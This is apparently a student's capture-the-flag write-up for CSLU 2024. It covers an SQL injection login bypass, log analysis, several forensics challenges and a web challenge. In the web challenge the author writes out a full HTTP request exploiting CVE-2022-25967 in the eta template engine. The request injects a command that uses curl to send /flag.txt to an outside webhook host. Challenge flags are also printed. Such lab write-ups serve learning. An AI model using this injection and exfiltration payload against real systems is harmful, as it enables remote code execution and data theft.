CSLU 2024 - HackMD

# Babysqli Description 1. Type: #web 2. Desc: - 3. Tools: - [sqli cheatsheet](https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/) 4. File: `source file` Flag: - --- - Just type `'-'` for admin and password. --- # Access log Description 1. Type: #web 2. Desc: - 3. Tools: - 4. File: `access.log` Flag: ||CSLU{this_is_the_flag_for_th15_challeng3}|| --- - When scrolling through the logs, I found out that most of it were 404, or error, so I tried to search for 200 only and i got this sus link. ```zsh 172.26.228.247 - - [08/Nov/2024:21:46:13 +0800] "GET /pastebin.com/us5L3fRp HTTP/1.1" 200 437 "-" "gobuster/3.6" ``` - The `pastebin` will lead you directly to the flag. # Forensics ## Dr. Mals 1. Download the Dr. Mals word file 2. Use Oletools - olevba to decrypt this file - ![image](https://github.com/user-attachments/assets/f6c2bc3c-cc2f-40dc-a40b-8eaef09150cd) 4. With the use of CyberChef, we can find out the encoded text - ![image](https://github.com/user-attachments/assets/927f7112-1acd-487a-8c57-a5a9fa5fa144) 5. Searching the website and it given - ![image](https://github.com/user-attachments/assets/3f0cf691-eea1-45ce-9dd9-30e9442d1a79) 6. Lets decode this - With the use of online decoderwe can find out the flag - ![image](https://github.com/user-attachments/assets/62c1dd32-c3a9-4a8d-9f3b-3b331119dba8) 7. Thats it. #### Acknowledgement Thx to Akram for providing Hint ## RE:Memory Delete 1. First, we download the attached file given by the challenge. - Challenge.7z 2. Unzip it. -Challenge.ad1 files inside. 3. .ad1 is a image files so lets use FTK Imager to find the deleted file 4. ![image](https://github.com/user-attachments/assets/98a6ce23-53b1-4a37-9a8c-9a9cae49e6f1) 5. There goes the flag ## Skyfall *Pain killer, My Skill issue... XD* 1. Download the file attach by the challenge. -capture.pcapng 2. Use wireshark to open the pcapng files 3. See the clue given, Love the EDITED LEWIS VERSION files and lost the flag. - ![image](https://github.com/user-attachments/assets/9ec25fe0-ecd3-4587-a4e7-5887377fbfbe) 4. File -> Export -> Http, and save all the files. 5. we can see there is 5 files exported, 2 text file with word ```File received successfully!``` and ```file_data=16ae9187d13259788a97aef16a7d50f8b6376fbcba92a0f53e7e68d9f562a3a6576a3183a8dc8631c64fbd9147c8b608``` - usefull for later 6. And there is a file with big data 24,345kb and let us see what file is that. - ![image](https://github.com/user-attachments/assets/395b8f53-8888-4af0-bf28-ae6f5b156992) 7. Looks like it is a elf file ![image](https://github.com/user-attachments/assets/a9223eb5-5494-4476-b76e-94ca61886bab) 8. I manage to find a website to extract the elf file [EzyZIP](https://www.ezyzip.com/open-extract-elf-file.html#) 9. We can see the largest file is here after extract - ![image](https://github.com/user-attachments/assets/d61f4dc0-bd2e-4e85-922c-cbaaa903fb5e) After have a long time searching, i cant found any ways to extract pydata... skill issue XD 10. After the end of the day, my friend told me there is something call ```Pyinstxtractor``` that can extract it. - ![image](https://github.com/user-attachments/assets/647ba1e4-5257-4eae-8e27-94885a3b018b) - This is what i found 11. okayyyy here is it - ![image](https://github.com/user-attachments/assets/839516f6-2d26-4c28-af8e-cfbd172314e6) 12. Theres alot files inside, but the one the name ``` -lewis-edited-version.pyc``` is the most suspicious. - ![image](https://github.com/user-attachments/assets/b3e6721f-12fd-4eba-a1fc-7d8d92ac3bc0) 13. With the use of this website [Pylingual](https://pylingual.io/), i transfer pyc files to py - ![image](https://github.com/user-attachments/assets/575f7882-fe26-4d1c-91f5-69de17c6099c) 14. We can see it is a AES encyption function and the key is the time which the user encrypt when downloaded, so lets go back to wireshark and find the date when she successfuly download. - ![image](https://github.com/user-attachments/assets/f286e913-9441-4f6b-8273-1b7df152b17d) - We can find out that the epoch for the time she download the file is ```1733988750``` 15. Then use GPT xd find the key out - ![image](https://github.com/user-attachments/assets/c5d87093-080a-410e-b361-ce07d7c64747) - ps: I also dk why need to use ```1733988749``` just told by my friend to use it cant find any things that support this epoch XD. 15. Okay, then let us go to decrypt it. Use cyberchef 16. ![image](https://github.com/user-attachments/assets/0a6837ae-ddf5-41d3-a810-7318c56a4607) Heres the flag. Okay its maybe abit harder than i though. cry die. #### Acknowledgement Thx to Bakayang for providing solution at the end of the day # WEB ## Useless Website 1. Download the source code of the website 2. We can see theres something in the package.json file - ![image](https://github.com/user-attachments/assets/ded38f60-d45c-406f-87ca-353241b395e5) 3. Searching on the internet ```CVE-2022-25967``` showing that there is some leakage can be use on the eta framework. 4. In burpsuite, intercept the web and change to this ``` POST /utils/settings HTTP/1.1 Host: 5.75.155.50:1341 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Content-Type: application/json Upgrade-Insecure-Requests: 1 If-None-Match: W/"1057-ih1IUXlwncna8aHynJLYIHjiX30" Priority: u=0, i Content-Length: 292 { "settings": { "view options": { "varName": "x=process.mainModule.require('child_process').execSync('curl https://webhook.site/self id/$(cat /flag.txt)')", "include": false, "includeFile": false, "useWith": true } } } ``` 5. And we can find out the flag at the end of the webhook link. - ![image](https://github.com/user-attachments/assets/ee3ce174-09de-43c1-82ea-43f979aa075d) - ```CSLU{wh4ts_y0ur_et4?}```